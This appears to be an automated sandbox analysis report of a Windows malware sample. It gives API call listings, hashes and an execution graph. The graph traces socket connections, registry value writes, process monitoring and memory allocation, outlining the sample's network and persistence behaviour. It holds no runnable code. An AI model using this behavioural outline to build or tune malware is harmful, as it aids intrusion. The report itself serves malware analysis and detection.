                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                                                • String ID:
                                                                                                • API String ID: 2538916108-0
                                                                                                • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                                                • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                                                • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                                                • DeleteObject.GDI32(00000000), ref: 00406878
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                • String ID:
                                                                                                • API String ID: 1900162674-0
                                                                                                • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                                                • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040749F
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                                                • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                                                  • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                  • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                                • String ID:
                                                                                                • API String ID: 1557639607-0
                                                                                                • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                                                • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                                                APIs
                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 612612615-0
                                                                                                • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                                • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                                                • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                                • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                                                APIs
                                                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@TextWindow$Length
                                                                                                • String ID:
                                                                                                • API String ID: 2308334395-0
                                                                                                • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                                • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                                                • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                                • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                                                APIs
                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                • String ID:
                                                                                                • API String ID: 2001801573-0
                                                                                                • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                                                • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 00401BA8
                                                                                                • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientScreen$ParentRectWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2099118873-0
                                                                                                • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                                                • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wtol
                                                                                                • String ID: GUIFlags$[G@
                                                                                                • API String ID: 2131799477-2126219683
                                                                                                • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                                                • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                                                APIs
                                                                                                • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentVariable
                                                                                                • String ID: ?O@
                                                                                                • API String ID: 1431749950-3511380453
                                                                                                • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                                                • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                                                                Execution Graph

                                                                                                Execution Coverage:6.5%
                                                                                                Dynamic/Decrypted Code Coverage:26.6%
                                                                                                Signature Coverage:5.9%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:40
                                                                                                execution_graph 70200 10003200 Sleep 70201 10020254 70200->70201 70202 100032e0 6 API calls 70203 10002d80 ResetEvent InterlockedExchange timeGetTime socket 70204 10002de8 70203->70204 70205 10002dfc lstrlenW WideCharToMultiByte 70203->70205 70257 10006815 70204->70257 70224 100067ff 70205->70224 70208 10002df6 70210 10002e59 collate 70211 10002e60 htons connect 70210->70211 70212 10002e96 70210->70212 70211->70212 70213 10002eab setsockopt setsockopt setsockopt setsockopt 70211->70213 70214 10006815 __NMSG_WRITE 5 API calls 70212->70214 70216 10002f52 InterlockedExchange 70213->70216 70217 10002f24 WSAIoctl 70213->70217 70215 10002ea5 70214->70215 70236 1000721b 70216->70236 70217->70216 70220 1000721b 747 API calls 70221 10002f91 70220->70221 70222 10006815 __NMSG_WRITE 5 API calls 70221->70222 70223 10002fa6 70222->70223 70226 10006f17 70224->70226 70227 10002e22 lstrlenW WideCharToMultiByte gethostbyname 70226->70227 70231 10006f3d std::exception::exception 70226->70231 70265 10006e83 70226->70265 70282 10008550 DecodePointer 70226->70282 70227->70210 70229 10006f7b 70284 10006e24 66 API calls std::exception::operator= 70229->70284 70231->70229 70283 100073e9 76 API calls __cinit 70231->70283 70232 10006f85 70285 10007836 RaiseException 70232->70285 70235 10006f96 70237 1000722b 70236->70237 70238 1000723f 70236->70238 70321 1000710d 66 API calls __getptd_noexit 70237->70321 70294 10009754 TlsGetValue 70238->70294 70241 10007230 70322 10008702 11 API calls __fclose_nolock 70241->70322 70245 10002f79 70245->70220 70247 100072a2 70323 10006e49 66 API calls 2 library calls 70247->70323 70251 100072a8 70251->70245 70324 10007133 66 API calls 2 library calls 70251->70324 70253 10007267 CreateThread 70253->70245 70256 1000729a GetLastError 70253->70256 70382 100071b6 70253->70382 70256->70247 70258 1000681d 70257->70258 70259 1000681f IsDebuggerPresent 70257->70259 70258->70208 70805 1000b5e6 70259->70805 70262 1000794f SetUnhandledExceptionFilter UnhandledExceptionFilter 70263 10007974 GetCurrentProcess TerminateProcess 70262->70263 70264 1000796c __call_reportfault 70262->70264 70263->70208 70264->70263 70266 10006f00 70265->70266 70276 10006e91 70265->70276 70292 10008550 DecodePointer 70266->70292 70268 10006f06 70293 1000710d 66 API calls __getptd_noexit 70268->70293 70271 10006ebf RtlAllocateHeap 70272 10006ef8 70271->70272 70271->70276 70272->70226 70274 10006e9c 70274->70276 70286 10008508 66 API calls __NMSG_WRITE 70274->70286 70287 10008359 66 API calls 5 library calls 70274->70287 70288 10008098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 70274->70288 70275 10006eec 70290 1000710d 66 API calls __getptd_noexit 70275->70290 70276->70271 70276->70274 70276->70275 70280 10006eea 70276->70280 70289 10008550 DecodePointer 70276->70289 70291 1000710d 66 API calls __getptd_noexit 70280->70291 70282->70226 70283->70229 70284->70232 70285->70235 70286->70274 70287->70274 70289->70276 70290->70280 70291->70272 70292->70268 70293->70272 70295 10007245 70294->70295 70296 10009769 DecodePointer TlsSetValue 70294->70296 70297 10009fe4 70295->70297 70296->70295 70299 10009fed 70297->70299 70300 10007251 70299->70300 70301 1000a00b Sleep 70299->70301 70325 1000e555 70299->70325 70300->70247 70303 1000990f 70300->70303 70302 1000a020 70301->70302 70302->70299 70302->70300 70336 10009896 GetLastError 70303->70336 70305 10009917 70306 1000725e 70305->70306 70350 10008315 66 API calls 3 library calls 70305->70350 70308 100097e2 70306->70308 70352 10009db0 70308->70352 70310 100097ee GetModuleHandleW 70353 1000c144 70310->70353 70312 1000982c InterlockedIncrement 70360 10009884 70312->70360 70315 1000c144 __lock 64 API calls 70316 1000984d 70315->70316 70363 1000de7f InterlockedIncrement 70316->70363 70318 1000986b 70375 1000988d 70318->70375 70320 10009878 _doexit 70320->70253 70321->70241 70322->70245 70323->70251 70324->70245 70326 1000e561 70325->70326 70332 1000e57c 70325->70332 70327 1000e56d 70326->70327 70326->70332 70334 1000710d 66 API calls __getptd_noexit 70327->70334 70329 1000e58f RtlAllocateHeap 70329->70332 70330 1000e572 70330->70299 70332->70329 70333 1000e5b6 70332->70333 70335 10008550 DecodePointer 70332->70335 70333->70299 70334->70330 70335->70332 70337 10009754 ___set_flsgetvalue 3 API calls 70336->70337 70338 100098ad 70337->70338 70339 10009903 SetLastError 70338->70339 70340 10009fe4 __calloc_crt 62 API calls 70338->70340 70339->70305 70341 100098c1 70340->70341 70341->70339 70342 100098c9 DecodePointer 70341->70342 70343 100098de 70342->70343 70344 100098e2 70343->70344 70345 100098fa 70343->70345 70347 100097e2 __getptd_noexit 62 API calls 70344->70347 70351 10006e49 66 API calls 2 library calls 70345->70351 70349 100098ea GetCurrentThreadId 70347->70349 70348 10009900 70348->70339 70349->70339 70351->70348 70352->70310 70354 1000c159 70353->70354 70355 1000c16c EnterCriticalSection 70353->70355 70378 1000c082 66 API calls 8 library calls 70354->70378 70355->70312 70357 1000c15f 70357->70355 70379 10008315 66 API calls 3 library calls 70357->70379 70380 1000c06b LeaveCriticalSection 70360->70380 70362 10009846 70362->70315 70364 1000dea0 70363->70364 70365 1000de9d InterlockedIncrement 70363->70365 70366 1000deaa InterlockedIncrement 70364->70366 70367 1000dead 70364->70367 70365->70364 70366->70367 70368 1000deb7 InterlockedIncrement 70367->70368 70369 1000deba 70367->70369 70368->70369 70370 1000dec4 InterlockedIncrement 70369->70370 70371 1000dec7 70369->70371 70370->70371 70372 1000dee0 InterlockedIncrement 70371->70372 70373 1000def0 InterlockedIncrement 70371->70373 70374 1000defb InterlockedIncrement 70371->70374 70372->70371 70373->70371 70374->70318 70381 1000c06b LeaveCriticalSection 70375->70381 70377 10009894 70377->70320 70378->70357 70380->70362 70381->70377 70383 10009754 ___set_flsgetvalue 3 API calls 70382->70383 70384 100071c1 70383->70384 70397 10009734 TlsGetValue 70384->70397 70387 100071d0 70448 10009788 DecodePointer 70387->70448 70388 100071fa 70399 10009929 70388->70399 70390 10007215 70435 10007175 70390->70435 70393 100071df 70395 100071f0 GetCurrentThreadId 70393->70395 70396 100071e3 GetLastError ExitThread 70393->70396 70395->70390 70398 100071cc 70397->70398 70398->70387 70398->70388 70400 10009935 _doexit 70399->70400 70401 1000994d 70400->70401 70404 10009a37 _doexit 70400->70404 70449 10006e49 66 API calls 2 library calls 70400->70449 70403 1000995b 70401->70403 70450 10006e49 66 API calls 2 library calls 70401->70450 70409 10009969 70403->70409 70451 10006e49 66 API calls 2 library calls 70403->70451 70404->70390 70407 10009985 70412 10009993 70407->70412 70454 10006e49 66 API calls 2 library calls 70407->70454 70408 10009977 70408->70407 70453 10006e49 66 API calls 2 library calls 70408->70453 70409->70408 70452 10006e49 66 API calls 2 library calls 70409->70452 70414 100099a1 70412->70414 70455 10006e49 66 API calls 2 library calls 70412->70455 70416 100099b2 70414->70416 70456 10006e49 66 API calls 2 library calls 70414->70456 70417 1000c144 __lock 66 API calls 70416->70417 70419 100099ba 70417->70419 70420 100099df 70419->70420 70421 100099c6 InterlockedDecrement 70419->70421 70458 10009a43 LeaveCriticalSection _doexit 70420->70458 70421->70420 70422 100099d1 70421->70422 70422->70420 70457 10006e49 66 API calls 2 library calls 70422->70457 70424 100099ec 70426 1000c144 __lock 66 API calls 70424->70426 70427 100099f3 70426->70427 70428 10009a24 70427->70428 70459 1000df0e 8 API calls 70427->70459 70461 10009a4f LeaveCriticalSection _doexit 70428->70461 70431 10009a31 70462 10006e49 66 API calls 2 library calls 70431->70462 70433 10009a08 70433->70428 70460 1000dfa7 66 API calls 4 library calls 70433->70460 70436 10007181 _doexit 70435->70436 70437 1000990f __getptd 66 API calls 70436->70437 70438 10007186 70437->70438 70463 100030c0 70438->70463 70468 10002fb0 70438->70468 70478 100052b0 70438->70478 70489 100052d9 70438->70489 70439 10007190 70500 10007156 70439->70500 70448->70393 70449->70401 70450->70403 70451->70409 70452->70408 70453->70407 70454->70412 70455->70414 70456->70416 70457->70420 70458->70424 70459->70433 70460->70428 70461->70431 70462->70404 70464 100030d4 70463->70464 70465 10003128 70463->70465 70464->70465 70466 100030e8 Sleep 70464->70466 70467 10003104 timeGetTime 70464->70467 70465->70439 70466->70464 70467->70464 70469 100067ff 77 API calls 70468->70469 70477 10002fd3 70469->70477 70470 1000306d 70472 10006815 __NMSG_WRITE 5 API calls 70470->70472 70471 10003014 select 70471->70470 70471->70477 70474 10003098 70472->70474 70473 10003032 recv 70473->70477 70474->70439 70476 1000710d 66 API calls __lseeki64_nolock 70476->70477 70477->70470 70477->70471 70477->70473 70477->70476 70506 10003350 70477->70506 70479 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 70478->70479 70486 100052cc 70478->70486 70480 100053ca 70479->70480 70481 1000543c 70479->70481 70484 10005403 OpenProcess 70480->70484 70487 1000542f Sleep 70480->70487 70588 10005820 70480->70588 70610 3670497 70481->70610 70484->70480 70485 10005415 GetExitCodeProcess 70484->70485 70485->70480 70486->70479 70487->70484 70492 100052d2 70489->70492 70490 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 70491 1000543c 70490->70491 70495 100053ca 70490->70495 70499 3670497 577 API calls 70491->70499 70492->70490 70493 10005820 103 API calls 70493->70495 70494 10005442 70494->70439 70495->70493 70496 10005403 OpenProcess 70495->70496 70498 1000542f Sleep 70495->70498 70496->70495 70497 10005415 GetExitCodeProcess 70496->70497 70497->70495 70498->70496 70499->70494 70501 10009896 __getptd_noexit 66 API calls 70500->70501 70502 10007160 70501->70502 70503 1000716b ExitThread 70502->70503 70804 10009a58 79 API calls __freefls@4 70502->70804 70505 1000716a 70505->70503 70507 10003366 70506->70507 70518 10001100 70507->70518 70509 100034e1 70509->70477 70510 100034c6 70511 100011b0 70 API calls 70510->70511 70512 100034d8 70511->70512 70512->70477 70513 10003378 _memmove 70513->70509 70513->70510 70514 10003403 timeGetTime 70513->70514 70516 100011b0 70 API calls 70513->70516 70535 100054c0 70513->70535 70526 100011b0 70514->70526 70516->70513 70519 10001111 70518->70519 70520 1000110b 70518->70520 70567 10006ba0 70519->70567 70520->70513 70522 10001134 VirtualAlloc 70523 1000116f 70522->70523 70524 10001198 70523->70524 70525 1000118a VirtualFree 70523->70525 70524->70513 70525->70524 70527 100011bd 70526->70527 70528 100011c6 70527->70528 70529 10006ba0 __floor_pentium4 68 API calls 70527->70529 70528->70513 70530 100011ee 70529->70530 70531 10001214 70530->70531 70532 1000121b VirtualAlloc 70530->70532 70531->70513 70533 10001236 70532->70533 70534 10001247 VirtualFree 70533->70534 70534->70513 70536 100054dc 70535->70536 70537 1000580d 70535->70537 70538 10005707 VirtualAlloc 70536->70538 70539 100054e7 RegOpenKeyExW 70536->70539 70537->70513 70541 10005745 70538->70541 70540 10005515 RegQueryValueExW 70539->70540 70546 100055ba 70539->70546 70542 1000553a 70540->70542 70543 100055ad RegCloseKey 70540->70543 70545 100067ff 77 API calls 70541->70545 70544 100067ff 77 API calls 70542->70544 70543->70546 70547 10005540 _memset 70544->70547 70548 10005758 70545->70548 70549 100055f5 70546->70549 70560 100056f8 70546->70560 70551 1000554d RegQueryValueExW 70547->70551 70552 10005788 RegCreateKeyW 70548->70552 70548->70560 70550 100055fe VirtualFree 70549->70550 70561 10005611 _memset 70549->70561 70550->70561 70554 10005569 VirtualAlloc 70551->70554 70555 100055aa 70551->70555 70556 100057a3 RegDeleteValueW RegSetValueExW 70552->70556 70557 100057ca 